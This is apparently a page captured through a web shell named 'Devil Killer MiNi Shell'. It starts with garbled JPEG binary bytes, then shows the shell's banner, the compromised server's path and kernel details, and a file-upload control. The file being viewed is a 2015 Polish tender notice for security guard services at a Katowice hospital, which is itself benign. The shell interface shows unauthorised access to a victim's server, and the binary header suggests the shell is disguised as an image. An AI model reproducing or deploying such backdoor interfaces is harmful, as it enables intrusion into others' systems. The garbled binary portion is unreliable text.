JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150515/114260-N-2015.html

<p class="kh_header"><b>Katowice: Przetarg nieograniczony o wartości szacunkowej zamówienia powyżej 30.000 EURO na ochronę obiektów i terenu Szpitala im. Stanisława Leszczyńskiego w Katowicach wraz z monitorowaniem systemów alarmowych</b><br>
<b>Numer ogłoszenia: 114260 - 2015; data zamieszczenia: 15.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital im. Stanisława Leszczyńskiego , ul. Raciborska 26, 40-074 Katowice, woj. śląskie, faks 032 2514533.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony o wartości szacunkowej zamówienia powyżej 30.000 EURO na ochronę obiektów i terenu Szpitala im. Stanisława Leszczyńskiego w Katowicach wraz z monitorowaniem systemów alarmowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ochrona obiektów i terenu Szpitala im. Stanisława Leszczyńskiego w Katowicach wraz z monitorowaniem systemów alarmowych. 
Oznaczenie przedmiotu zamówienia CPV 79710000-4 usługi ochroniarskie. 
Opis przedmiotu zamówienia
A. Szczegółowe czynności dotyczące prac w zakresie zapewnienia ochrony, tj. zabezpieczenia mienia i osób w obiektach, wg poniższej lokalizacji, znajdujących się na terenach Szpitala  im. Stanisława Leszczyńskiego w Katowicach są następujące:
1.  w Katowicach, przy ul. Raciborskiej 27
a) całodobowy dozór - ochrona, a w szczególności:
- zapewnienie ochrony personelu szpitala, pacjentów;
- zapewnienie ochrony obiektów poprzez działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu szpitala;
- nadzór nad porządkiem na terenie szpitala;
- niezwłoczne przeciwdziałanie ( skuteczne interwencje ) zakłóceniom porządku publicznego i gorszącym ogół zachowaniom osoby (-ób)  przebywającej   (-cych) na terenie szpitala, a w szczególności w okolicach recepcji izby przyjęć, w godzinach późnopopołudniowych i nocnych; - szczególny nadzór nad obiektami i terenem od strony północno-wschodniej i północno-zachodniej ogrodzenia terenu;
- szczególna ochrona rzeźby Wiktoria Rzucająca Wieniec;
- zgłaszanie Kierownikowi Sekcji Techniczno-Gospodarczej i odpowiednim służbom technicznym (pracownicy pionu technicznego szpitala) wszelkich nieprawidłowości 
w funkcjonowaniu podległych im dziedzin; 
- informowanie Kierownika Sekcji Techniczno-Gospodarczej i odpowiednich służb (straż pożarna, policja, administracja szpitala) o zaistniałych zagrożeniach lub nagłych
 zdarzeniach;
- w przypadku zaistnienia zdarzeń nagłych, nadzwyczajnych, takich jak włamanie, pożar, zalanie, dewastacja mienia itp. działanie zgodnie z instrukcjami szpitala,  niezwłoczne zabezpieczenie miejsca zdarzenia poprzez niedopuszczenie osób postronnych, udzielenie pierwszej pomocy osobom poszkodowanym, jeżeli takie wystąpią oraz w miarę możliwości zminimalizowanie skutków zdarzenia oraz ustalenie świadków zdarzenia;
- uzbrajanie i wyłączanie alarmów oraz zamykanie i otwieranie poradni specjalistycznej i   pracowni mammografii;
- regularne obchody ( co najmniej 6 razy w ciągu zmiany )  - patrolowanie chronionego terenu i sprawdzanie ustalonego stanu zabezpieczeń obiektów, potwierdzone wprowadzonym przez Wykonawcę systemem kontroli - zgłaszania patrolu w punktach kontroli;  
- wydawanie i odbieranie kluczy od poszczególnych pomieszczeń i obiektów             osobom upoważnionym, prowadzenie stosownej ewidencji;
- obsługa i obserwacja wjazdu dla karetek, korytarzy parteru Centralnej Izby Przyjęć przy pomocy monitoringu cctv, central ochrony p.poż., gazów medycznych i sieci elektroenergetycznej;
- prowadzenie Książki raportów dziennych służby;
- niedopuszczalne jest pozostawienie miejsc ochrony bez obsady - samowolne opuszczenie posterunku.  
 b) całodobowe pełnienie służby przy wjeździe na teren szpitala Miejscami pełnienia służby dozoru całodobowego dla czynności opisanych w ppkt a), b) są : 
- pomieszczenie ochrony w budynku Centralnej Izby Przyjęć, 
- teren szpitala, ze szczególnym uwzględnieniem okolicy bram wjazdowych.  
c) w Zakładzie Radioterapii i w Pracowni rezonansu magnetycznego nadzór i ochrona całodobowe, a w szczególności:
- zapewnienie ochrony personelu szpitala, pacjentów;
- zapewnienie ochrony obiektów poprzez działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu szpitala;
- nadzór nad porządkiem na terenie obiektu;
- niezwłoczne przeciwdziałanie ( skuteczne interwencje ) zakłóceniom porządku publicznego i gorszącym ogół zachowaniom osoby (-ób)  przebywającej   (-cych)  na terenie obiektu;
 - prowadzenie kontroli wydawania i zdawania kluczy od poszczególnych pomieszczeń;
- zgłaszanie Kierownikowi Sekcji Techniczno-Gospodarczej i odpowiednim służbom
technicznym (pracownicy pionu technicznego szpitala) wszelkich nieprawidłowości 
w funkcjonowaniu podległych im dziedzin; 
- informowanie Kierownika Sekcji Techniczno-Gospodarczej i odpowiednich służb (straż
 pożarna, policja, administracja szpitala) o zaistniałych zagrożeniach lub nagłych zdarzeniach;
- w przypadku zaistnienia zdarzeń nagłych, nadzwyczajnych, takich jak włamanie, pożar,  zalanie, dewastacja mienia itp. działanie zgodnie z instrukcjami szpitala, niezwłoczne zabezpieczenie miejsca zdarzenia poprzez niedopuszczenie osób postronnych, udzielenie pierwszej pomocy osobom poszkodowanym, jeżeli takie wystąpią oraz w miarę możliwości zminimalizowanie skutków zdarzenia oraz ustalenie świadków zdarzenia;
- uzbrajanie i wyłączanie alarmów oraz zamykanie i otwieranie pracowni rezonansu  magnetycznego;
 - regularne obchody ( co najmniej 6 razy w ciągu zmiany )  , sprawdzanie stanu jego
zabezpieczeń oraz obsługa i obserwacja otoczenia wejścia i Pracowni Rezonansu
Magnetycznego przy pomocy monitoringu cctv i systemu alarmowego;
- prowadzenie Książki raportów dziennych służby.
- niedopuszczalne jest pozostawienie miejsc ochrony bez obsady - samowolne opuszczenie posterunku w Katowicach, przy ul. Raciborskiej 26 i 28
 a) nadzór i ochrona w dni powszednie od godziny 15.00 do 7.00 dnia następnego,
 a w dni wolne, świąteczne - całodobowe, a w szczególności:
  - zapewnienie ochrony personelu szpitala, osób trzecich  przebywających w obiektach;- zapewnienie ochrony obiektów poprzez działania zapobiegające przestępstwom  i wykroczeniom przeciwko mieniu szpitala;
- nadzór nad porządkiem na terenie przyległym do budynków;
- niezwłoczne przeciwdziałanie ( skuteczne interwencje ) zakłóceniom porządku publicznego i gorszącym ogół zachowaniom osoby (-ób)  przebywającej   (-cych)  na terenie obiektów;
- zgłaszanie Kierownikowi Sekcji Techniczno-Gospodarczej i odpowiednim służbom technicznym (pracownicy pionu technicznego szpitala) wszelkich nieprawidłowości 
w funkcjonowaniu podległych im dziedzin; 
- informowanie Kierownika Sekcji Techniczno-Gospodarczej,  odpowiednich służb (straż pożarna, policja, administracja szpitala) o zaistniałych zagrożeniach lub nagłych
 zdarzeniach; 
-  w przypadku zaistnienia zdarzeń nagłych, nadzwyczajnych, takich jak włamanie, pożar,  zalanie, dewastacja mienia itp. działanie zgodnie z instrukcjami szpitala, niezwłoczne zabezpieczenie miejsca zdarzenia poprzez niedopuszczenie osób postronnych, udzielenie pierwszej pomocy osobom poszkodowanym, jeżeli takie wystąpią oraz w miarę możliwości zminimalizowanie skutków zdarzenia oraz ustalenie świadków zdarzenia;
- uzbrajanie i wyłączanie alarmów oraz zamykanie i otwieranie budynków zarządu  szpitala i poradni;
- pełnienie zastępstwa w przypadku nieobecności pracownika szpitala obsługującego połączenia telefoniczne
- regularne obchody ( co najmniej 6 razy w ciągu zmiany )  , sprawdzanie stanu zabezpieczeń obiektów;
- niedopuszczalne jest pozostawienie miejsc ochrony bez obsady - samowolne opuszczenie posterunku. 
b)  dodatkowo w dni powszednie od godziny 15.00 do 7.00 dnia następnego, a w dni wolne, świąteczne całodobowe, pełnienie służby w pomieszczeniu portierni:
-wydawanie i odbieranie kluczy od poszczególnych obiektów osobom upoważnionym;
- prowadzenie stosownej ewidencji;
- obsługa połączeń telefonicznych,
- prowadzenie Książki raportów dziennych służby.           
3. w Katowicach, przy ul. Józefowskiej 119
a) całodobowy dozór - ochrona, a w szczególności
- zapewnienie ochrony personelu szpitala, pacjentów;
- zapewnienie ochrony obiektów poprzez działania zapobiegające przestępstwom  i wykroczeniom przeciwko mieniu szpitala;
- nadzór nad porządkiem na terenie szpitala;
- niezwłoczne przeciwdziałanie ( skuteczne interwencje ) zakłóceniom porządku publicznego i gorszącym ogół zachowaniom osoby (-ób)  przebywającej   (-cych) na terenie szpitala; 
- szczególny nadzór nad obiektami i terenem od strony za budynkiem administracji Z-2;
- zgłaszanie Kierownikowi Sekcji Techniczno-Gospodarczej i odpowiednim służbom (pracownicy pionu technicznego szpitala) wszelkich nieprawidłowości w funkcjonowaniu podległych im dziedzin; 
- informowanie Kierownika Sekcji Techniczno-Gospodarczej i odpowiednich służb (straż pożarna, policja, administracja szpitala) o zaistniałych zagrożeniach lub nagłych zdarzeniach;
- w przypadku zaistnienia zdarzeń nagłych, nadzwyczajnych, takich jak włamanie, pożar,  zalanie, dewastacja mienia itp. działanie zgodnie z instrukcjami szpitala,  niezwłoczne zabezpieczenie miejsca zdarzenia poprzez nie dopuszczenie osób postronnych, udzielenie pierwszej pomocy osobom poszkodowanym, jeżeli takie wystąpią oraz w miarę możliwości zminimalizowanie skutków zdarzenia oraz ustalenie świadków zdarzenia;
 - uzbrajanie i wyłączanie alarmu oraz zamykanie i otwieranie budynku administracji Z-2;
- regularne obchody ( co najmniej 6 razy w ciągu zmiany )  - patrolowanie chronionego terenu i sprawdzanie ustalonego stanu zabezpieczeń obiektów, potwierdzone
wprowadzonym przez Wykonawcę systemem kontroli - zgłaszania patrolu w punktach kontroli;
- niedopuszczalne jest pozostawienie miejsc ochrony bez obsady - samowolne opuszczenie posterunku.  
b) dodatkowo całodobowe pełnienie służby w pawilonie portierni :
- wydawanie i odbieranie kluczy od poszczególnych obiektów osobom upoważnionym, prowadzenie stosownej ewidencji;
- obsługa całodobowo połączeń telefonicznych; 
- prowadzenie Książki raportów dziennych służby. 
B. Wymogi dotyczące pracowników ochrony fizycznej Wykonawcy Wykonawca zapewni pracowników ochrony fizycznej, posiadających zdolność fizyczną  i psychiczną do wykonywania zadań, stwierdzoną orzeczeniami lekarskim i psychologicznym,których ważność nie upłynęła, a także posiadających przygotowanie teoretyczne i praktyczne w zakresie technik interwencyjnych oraz znajomość przepisów prawa związanych  z wykonywaniem ochrony osób i mienia. Ponadto, pracownicy ochrony fizycznej będą spełniać wymogi zawarte w art. 20, 21, 21a ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia  ( jednolity tekst Dz.U. z 2014 r. poz. 1099 ).  
Pracownik ochrony fizycznej ma: 
- pełnić służbę ochrony w przyjętym przez Wykonawcę wzorze umundurowania i z identyfikatorem umieszczonym w widocznym miejscu;
- używać środków i technik interwencyjnych adekwatnie do zaistniałych zdarzeń
nadzwyczajnych ( w tym współdziałać z grupą interwencyjną );
- posiadać środek łączności do kontaktów z upoważnionymi pracownikami szpitala, służbami, grupą interwencyjną; 
- być taktownym i grzecznym, a zarazem zdecydowanym w działaniu;
-  zachować w tajemnicy informacje uzyskane w związku z wykonywaną służbą,  a w  szczególności dane dot. zabezpieczeń, systemu łączności, kodów, osób oraz inne, których ujawnienie może narazić kogokolwiek na szkodę lub naruszyć jego dobra osobiste; Załącznik do Umowy - Oświadczenie o poufności 
-  znać i stosować wszystkie wprowadzone w życie przez Zamawiającego instrukcje  i procedury dotyczące bezpieczeństwa informacji, bezpieczeństwa fizycznego, wypływające z normy ISO 27001:2013, a w szczególności Regulaminu ochrony danych osobowych Szpitala, rozmieszczenia systemów alarmowych, systemów powiadamiania osób i właściwych instytucji,  lokalizacji głównych zaworów i wyłączników, planów ewakuacji w obliczu zagrożeń ( wykaz z  dokumentami będą  dostarczone Wykonawcy przed rozpoczęciem wykonywania dozoru i ochrony;  wykaz przekazanych dokumentów będzie stanowić załącznik do Umowy );udzielać informacji osobom pytającym przebywającym na terenie szpitala  w dopuszczalnym   zakresie i w miarę posiadanej wiedzy;  znać i stosować przepisy w zakresie bezpieczeństwa i higieny pracy.
C. Czas reakcji i przyjazdu grupy interwencyjnej do 10 minut od zgłoszenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu będzie wymagane wadium w wysokości: 7 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełnione i podpisane Załączniki do SIWZ, oświadczeniem Wykonawcy że zapoznał się z obiektami Zamawiającego i jego właściwościami - potwierdzone notatką</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital im. St. Leszczyńskiego w Katowicach, 40-074 Katowice, ul.Raciborska 26 - Dział Księgowości.Na wniosek Wykonawcy SIWZ zostanie wysłana za zaliczeniem pocztowym (koszt 10 zł brutto)..</p>
